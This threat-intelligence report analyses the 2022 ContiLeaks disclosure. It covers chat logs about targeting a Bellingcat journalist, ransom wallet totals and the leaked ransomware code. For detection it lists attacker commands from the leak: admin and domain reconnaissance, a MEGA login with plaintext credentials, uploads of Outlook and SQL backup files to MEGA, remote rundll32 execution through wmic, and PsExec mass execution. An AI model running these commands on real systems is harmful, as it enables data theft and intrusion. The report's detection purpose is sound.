Following the announcement of support for the Russian government by the Conti group, an anonymous person identified on twitter only as ContiLeaks declared his support for Ukraine in the ongoing war. On February 27 he began leaking internal information from the ransomware group. This is just over a year of records of conversations between its operators, victims, and other key individuals, as well as technical details about the attacks carried out and the infrastructure used, amounts received, and even the addresses of cryptocurrency wallets, some still holding money from ransoms received.

Conversation History

One of the richest materials for threat intelligence purposes are the records of conversations between Conti members. Its content is extensive and still under analysis, but it has already brought important revelations, such as a possible association between the group and the FSB (Russian intelligence agency that replaced the KGB).

In April last year, two members discuss a targeted hack on a journalist from the Bellingcat group, specifically targeting files on Alexei Navalny, a former political opponent of Vladimir Putin poisoned in August 2020.

"Bro is such a question - we work on politics?)"
"in what respect?"
"<Johnyboy77> If the info is some kind of important supposedly
[21:04:21]  <Johnyboy77> or just score?
[21:10:55] <Mango> Hi Bro
[21:11:06]  <Mango> Come on)
[21:11:12]  <Johnyboy77> Property
[21:11:13]  <Mango> In general, we work for loot :)
[21:11:20]  <Mango> And fuck from whom to demand it
[21:11:22]  <Johnyboy77> I merged the correspondence of people who are working
against the Russian Federation
[21:11:25]  <Johnyboy77> in the information field
[21:11:31]  <Johnyboy77> But I can not decipher
[21:11:34]  <Johnyboy77> Correspondence of the signal
[21:11:52]  <Johnyboy77> shorter journalists
[21:11:54]  <Mango> I will ask)
[21:11:55]  <Johnyboy77> which are pussy against the Russian Federation
[21:12:04]  <Johnyboy77> current file brooms fucking can not decipher
[21:12:13]  <Johnyboy77> piece of concrete happened "
"We need this?"
"I don't know how to decorate a signal"
"Or we are current for loot and without political fuss"
"This is E2E"
"Soron I can not do anything here ("
"I even want to help \ Note to help"
"So, in general, we are interested in such data?"
"Ie we are patriots or how?)))"
"We are of course patriots)"
"I understood. If they decipher there - the Mayakna"
"And I wrote there other day to you about Aucion, but I understand you while
busy and did not delve)"
[21:21:02]  <Johnyboy77> in short So say
[21:21:08]  <Johnyboy77> And all of his passwords are
[21:21:17]  <Johnyboy77> And she is still Valid
[21:30:56]  <Mango> Well Corresponders at least Zaskrinh them
[21:31:05]  <Mango> Need spectects bro what to say
[21:31:07]  <Johnyboy77> Pink out files
[21:31:12]  <Johnyboy77> navalni FSB

Some time later, there is a new charge and reference to a "boss":

"Bro about Navalny do not forget, I looked at the chief - he is waiting for details"

The story under discussion is probably Hunting the Hunters: How We Identified Navalny's FSB Stalkers, which details how the Bellingcat team identified the FSB officers involved in monitoring and tracking Navalny at the time of his poisoning.

The conversations also revealed addresses of bitcoin wallets used by the group. A count by the vx-underground group showed that between April 21, 2017 and February 28, 2022, Conti's main wallet accumulated about $2.7 billion:

Apparently, the ransomware group has not yet been able to identify who is leaking their data on Twitter. Chat logs from March 1, 2022 show the internal confusion:

"ts": "2022-03-01T14:09:27.345914",
"from": "qwerty@q3mcco35auwcstmt.onion",
"to": "cybergangster@q3mcco35auwcstmt.onion",
"body": "Listen, Azim and Smelian wrote me today, they're worried they're
falling over17:09that they've been messing with us17:09what should I tell them?"
"ts": "2022-03-01T16:12:42.619523",
"from": "wind@q3mcco35auwcstmt.onion",
"to": "mango@q3mcco35auwcstmt.onion",
"body": "who leaked, did you find out?{backslash}do you think we'll rebel?"

It is interesting to note that the recipient of the second message, Mango, is the same one involved in the talks about Alexei Navalny in April 2021. There are several mentions of the Cobalt Strike tool in the leaks. Commands and legitimate binaries (LOLbins) associated with it are covered in the following section.

Cobalt Strike and LOLbins

Among the leaks released so far, Conti Rocket Chat Leaks.

7z (7B49130E26505A6AC3786591F548D492DD6D83CE8986477AD803FD04615209F8) contains a number of exploits of legitimate Windows executables during invasions of the Conti group. Pay special attention to commands beginning with "shell": these redirect input to the command prompt of the infected machine, which makes them very easy to detect.

We will not attach the full contents of this leak to this document, since it concentrates internal network data from victims of the group. For those interested in obtaining all occurrences of Cobalt Strike use in the file in question, we recommend the following command, adapted from @c3rb3ru5d3d53c:

find . -type f -name ".json" | grep -P '\d+-\d+-\d+..json' | while read i; do
cat $i | jq -r '.messages[].msg' | grep 'beacon>'; done

Some commands relevant to the detection of Conti activity to follow.

Redirected commands from CS to the command prompt

reg query HKCU\Environment

net localgroup administrators

net group "Domain admins" /dom

net group "Enterprise admins" /dom

start /b MEGAcmdServer.exe

MEGAclient.exe update -auto=off

MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd

MEGAclient.exe whoami

MEGAclient.exe put -q -ignore-quota-warn "C:\Users*****\DocumentsOutlook Files\ol.7z"

MEGAclient.exe put -q -ignore-quota-warn F:\SQLBackup*.bak

wmic /node:10...* process call create "rundll32 C:\ProgramDataxx64.dll entryPoint"

PsExec \* -d -s -h gpupdate /force -accepteula -y -u .local* -p *

We suppressed sensitive target information in the examples above. It is interesting to note that good detection practices would alert to several of the listed commands, such as using -accepteula to run SysInternals tools. It is also possible to see that Conti used MEGA (formerly megaupload) for some of his activities. Whether this behavior still remains in the current incursions of the group is unclear.

Source code and builder

The hardest blow against the criminal group came on March 1st with the leak of the ransomware's source code accompanied by its builder (the executable used to generate the final version that will be sent to victims).

This content is protected by a password that the user ContiLeaks provided to a small group of researchers. A second version was released shortly thereafter, this time without the password, which omitted the ransomware code and its main functions. Because of the choice of a deprecated encryption protocol, it was possible to use this second version to extract the protected content of the complete leak. Within that content, the builder is protected by a second, as yet undiscovered password.

It is likely that new ransomware groups and low-skill malicious actors will leverage the Conti source code to generate their own versions of this malware. For this reason, we will not share where to get the full leak or how to extract its contents without the password. Minimally competent researchers will be able to obtain this information easily.

Conclusion

This is still a developing situation. The analysis of so much material, whether in the form of code or in the form of chat logs, will take time. It seems that the leaker of the information has not yet been discovered by the group and should continue to publish information from Conti. We will keep everyone updated on our research involving this material and share as much information as possible with the security community.

For those who want to work directly with the leaks, you can download the compressed files at hxxps://share[.]vx-underground[.]org/Conti/. English translations of materials are available at the following GitHub addresses:

https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished

Finally, the bibliographical references in this report contain additional information. We recommend reading.

Bibliographic references

https://twitter.com/ContiLeaks/
https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished
https://blog.malwarebytes.com/threat-intelligence/2022/03/the-conti-ransomware-leaks/
https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/
https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/
https://arstechnica.com/information-technology/2022/03/conti-cybergang-gloated-when-leaking-victims-data-now-the-tables-are-turned/
https://www.theregister.com/2022/02/28/conti_ransomware_gang_chats_leaked